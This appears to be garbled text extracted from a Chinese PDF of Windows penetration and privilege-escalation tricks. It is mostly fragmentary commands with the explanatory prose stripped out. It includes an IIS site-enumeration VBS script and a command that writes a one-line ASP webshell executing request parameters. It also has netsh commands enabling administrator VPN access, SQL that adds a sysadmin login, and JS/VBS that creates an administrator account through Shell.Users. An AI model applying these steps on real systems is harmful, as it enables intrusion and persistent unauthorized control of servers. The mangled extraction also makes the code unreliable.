Windows渗透与提权技巧汇总.pdf

Windows MSSQL VNC Radmin Cmd Webshell VBS 1. On Error Resume Next 2. If (LCase(Right(WScript.Fullname, 11)) = wscript.exe) Then 3. MsgBox Space(12) IIS Virtual Web Viewer Space(12) Chr(13) Space(9) Usage:Cscript vWeb.vbs, 4096, Lilo 4. WScript.Quit 5. End If 6. Set objservice = GetObject(IIS://LocalHost/W3SVC) 7. For Each obj3w In objservice 8. If IsNumeric(obj3w.Name) Then 9. Set OService = GetObject(IIS://LocalHost/W3SVC/ obj3w.Name) 10. Set VDirObj = OService.GetObject(IIsWebVirtualDir, ROOT) 11. If Err 0 Then WScript.Quit (1) 12. WScript.Echo Chr(10) [ OService.ServerComment ] 13. For Each Binds In OService.ServerBindings 14. Web = { Replace(Binds, :, } { ) } 15. WScript.Echo Replace(Split(Replace(Web, , ), }{)(2), }, ) 16. Next 17. WScript.Echo Path : VDirObj.Path 18. End If 19. Next iis_spy ASPXIISSPY activeds.dllactiveds.tlb “echo ^%execute(request(“cmd”))%^ X:\\X.asp” “copy X:\ \X.asp”webshelltype data/htdocs.// CMD VPN administrator VPN netsh ras set user administrator permit administrator VPN netsh ras set user administrator deny VPN netsh ras show user VPN IP netsh ras ip show config IP netsh ras ip set addrassign method = pool 54 netsh ras ip add range from = to = 54 CmdDos SQL “c:\test.qry” exec master.dbo.sp_addlogin test,123 EXEC sp_addsrvrolemember test, sysadmin DOS cmd.exe /c isql -E /U alma /P /i c:\test.qry net.exe adsi js: 1. var o=new ActiveXObject( Shell.Users ); 2. z=o.create(test) ; 3. z.changePassword(123456,) 4. z.setting(AccountType)=3; 5. vbs: 6. view source 7. Set o=CreateObject( Shell.Users ) 8. Set z=o.create(test) 9. z.changePassword 123456, 10. z.setting(AccountType)=3 Cmd